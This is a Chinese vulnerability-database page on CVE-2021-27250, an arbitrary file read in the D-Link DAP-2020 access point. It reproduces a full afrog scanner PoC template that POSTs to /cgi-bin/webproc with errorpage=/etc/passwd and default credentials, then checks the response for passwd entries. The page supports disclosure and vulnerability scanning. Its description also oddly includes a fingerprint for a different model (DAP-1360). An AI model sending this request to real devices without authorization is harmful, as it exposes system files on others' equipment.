CVE-2021-27250: D-LINK DAP-2020 webproc 任意文件读取漏洞

日期: 2025-09-01 | 影响软件: D-LINK DAP-2020 | POC: 已公开

漏洞描述

近日D-Link发布公告[1]称旗下产品DAP-2020存在任意文件读取漏洞，CVE编号为CVE-2021-27250，目前已在硬件版本：A1，固件版本：1.01 上测试了PoC，由于漏洞影响核心组件，因此其他版本也可能受到此漏洞的影响 body="DAP-1360" && body="6.05"

PoC代码[已公开]

id: CVE-2021-27250

info:
  name: D-LINK DAP-2020 webproc 任意文件读取漏洞
  author: zan8in
  severity: critical
  description: |
    近日D-Link发布公告[1]称旗下产品DAP-2020存在任意文件读取漏洞，CVE编号为CVE-2021-27250，目前已在硬件版本：A1，固件版本：1.01 上测试了PoC，由于漏洞影响核心组件，因此其他版本也可能受到此漏洞的影响
    body="DAP-1360" && body="6.05"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/D-Link/D-LINK%20DAP-2020%20webproc%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2021-27250.html

rules:
  r0:
    request:
      method: POST
      path: /cgi-bin/webproc
      body: |
        getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-27250.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440） 无POC

CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

CVE-2021-1498: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

CVE-2021-1499: Cisco HyperFlex HX Data Platform - File Upload Vulnerability POC

CVE-2021-21234: Spring Boot Actuator Logview Directory Traversal POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440）无POC